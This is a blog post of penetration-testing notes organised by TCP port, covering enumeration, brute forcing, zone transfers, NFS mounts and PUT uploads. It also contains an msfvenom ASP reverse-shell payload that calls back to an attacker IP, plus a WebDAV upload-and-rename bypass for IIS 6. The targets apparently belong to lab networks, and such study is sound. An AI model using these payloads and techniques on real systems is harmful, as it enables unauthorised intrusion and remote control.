The-Process

Below is the Process. This is the process to follow based on the situation that presents itself during a Pentest.

Before assuming that the port is only listening on 1 service, use amap to check if multple services are running on the same port.

amap 192.168.254.15 12380

Protocol on 192.168.254.15:12380/tcp matches http
Protocol on 192.168.254.15:12380/tcp matches http-apache2
Protocol on 192.168.254.15:12380/tcp matches ntp
Protocol on 192.168.254.15:12380/tcp matches ssl

As we can see on port 12380 HTTP, NTP & SSL are running! we would of known this otherwise!
=================================================
TCP Port 21
nmap -sV -sC 10.11.1.8 -p 21
Banner grab - (nmap -v -p 21 -sV x.x.x.x --script=banner)

Try logging in Anonymously
lftp anonymous@IP
No Password (hit Enter)

=================================================

TCP Port 22
How to use a differ key exchange? 
-oKexAlgorithms=

e.g.
-oKexAlgorithms=diffie-hellman-group-exchange-sha1


=================================================

TCP Port 23
=================================================


 
=================================================
TCP Port 25
POP3 Enumeration

Check for usernmae enumeration


smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t 10.11.1.229

Test if VRFY is allowed..

telnet 10.11.1.229 25
Trying 10.11.1.229...
Connected to 10.11.1.229.
Escape character is '^]'.
220 MAIL ESMTP
HELO
501 HELO Invalid domain address.
HELO x
250 Hello.
VRFY root
502 VRFY disallowed.
VRFY blah
502 VRFY disallowed.
HELP
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

================================================= TCP Port 53 - DNS Related testing... (WHEN OPEN THIS IS USUALLY TO FACILITATE ZONE TRANSFERS)

TCP port 53 is unusual because we normally see this on UDP 53.

nslookup
> SERVER 'IP' - this command allows us to connect initially to the Name Server.

> 127.0.0.1 - lets see what we get from local host

>'IP' try the IP of the box your are testing
>'test.com' any host name that seems logical to the box that might help.

dnsrecon -r 127.0.0.0/24 -n 'IP' IP can be 192.168.1.1 or whatever you are testing

also try..
dnsrecon -r 127.0.1.0/24 -n 'IP'

next try..
dnsrecon -r '192.168.1.0/24' -n 192.168.1.1 - This time we look at the entire /24. you can also try /16 and /8 as needed.

next try with dig and add the dns server address..
dig axfr @192.168.1.2 (where 192.168.1.2 is the DNS Server address)

next try
dig axfr test.com @192.168.1.2

OR
dig axfr @192.168.1.2 test.com

================================================== TCP PORT 79 - FINGER (What user have/are logged in to the system)

1) Download finger-user-enum.pl
wget https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl

1.1)perl finger-user-enum.pl -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt  -t 10.10.10.76 | less -S

Getting the results can takes AGES! be PATIENT!
Also whilst waiting, you can run multiples so create a user.txt file and add in names that could be relevant based on other enumeration.

1.2) Once we have results we are looking for "pts/2" or "pts/3" (the terminal slthey logged into) also the Time and the address. This tells us that these names exist and are either currently logged in or have logged in recently.










================================================== TCP Port 80 (or any HTTP listening service)
nmap -sC -sV -A -p 80 ip
Nikto
dirbuster first as this seem to give better performance
dirsearch - test with "-f" this can change the outcome of directories from 302's to 200's - Not sure Why but try it!

If all responses are returning '200 OK' then start to wfuzz. Go to Wfuzz page
https://sql--injection.blogspot.com/p/wfuzz.html

if there is a /cgi-bin/ folder then search for .sh .py files!

Add a logical name into the 'hosts' file and re check the site.
Check for Webdav - nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
If sits run davtest - davtest -url http://10.11.1.229
then CADAVAR - cadvar

if the site has extensions like (.php) then add the extension option in diresearch "-e" or dirb "-X" 


Test For HTTP PUT Method - curl -X OPTIONS http://IP:PORT -v

If PUT available..
Upload a file - curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/directory/to/file" http://IP:Port 
Read the source code? --> Any comments? --> Any hint to a WordPress or Joomla Site?

If Joomla - run JScan
If WordPress - WPSCAN --> Goto Wordpress Section

If the webpage doesnt finish with an extension (e.g.) http://test/index - then try phpfilters.
php://filter/convert.base64-encode/resource=index

Got a login portal? Goto WEB LOGIN





=================================================
TCP Port 110 - POP3 - Read Email with LIST Command
#Try to brute force the pop3 names
nmap -sV --script=pop3-brute 10.10.10.51

Example
110/tcp open  pop3    JAMES pop3d 2.3.2
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 19457 guesses in 404 seconds, average tps: 47.2

|_  ERROR: Failed to connect.

root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

=================================================
TCP Port 111 - RPCBind
apt install nfs-common



  1. rpcinfo -p 192.168.1.112 | grep nfs
  2. showmount -e 192.168.1.11
  3. If we get an output like..
  4. Export list for 192.168.1.98:
    /home/vulnix *              
  5. The * indicates that any IP is allowed to connect.
  6. mount -t nfs /home/vulnix/ /mnt/whatever -nolock
  7. If we get a "Permission Denied" then this could be "root squashing" which means we cant access it basically.
=================================================
TCP  Port 135 Remote Procedure Call
nbtstat -a 


TCP Port 137

TCP Port 139

TCP Port 161

TCP Port 162

TCP Port 443

TCP Port 445
apt-get install smb4k -y


TCP Ports 512,513,514
apt-get install rsh-client

#Try to login with the root user or a user found already.
rlogin -l root 192.168.1.98

#If not try to brute - output is slow but will come.
nmap -p 513 --script rlogin-brute 192.168.1.98 -v 




TCP Port 3306

TCP Port 3389


Mail
POP3 Enumeration - Enumerate USERNAMES
smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t 10.11.1.229


IIS6.0 Server 2003 ASP File Upload
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.108 LPORT=4444 -f asp --arch x86 --platform windows > shell_reverse_tcp.asp


dav:/> put shell_reverse_tcp.txt                                                                        │
Uploading shell_reverse_tcp.txt to `/shell_reverse_tcp.txt':                                            │
Progress: [=============================>] 100.0% of 38349 bytes succeeded.                             │
dav:/> copy shell_reverse_tcp.txt shell_reverse_tcp.asp;.txt                                            │
Copying `/shell_reverse_tcp.txt' to `/shell_reverse_tcp.asp%3b.txt':  succeeded.                        │
dav:/>  



Image Files

exiftool -a -u -g1 FILENAME
binwalk -ME FILENAME




Using Put to create a shell with  IIS 6 - Create payload then upload it and switch names to .txt form there copy it to .asp;.txt

Opening Database Files
-SDF files can be opened with SQL Query Compact Analyser;
-MDF files can be opened with SQL MDF Viewer

LFI
found an LFI? or want to test for LFI use lfisuite

No comments:

Post a Comment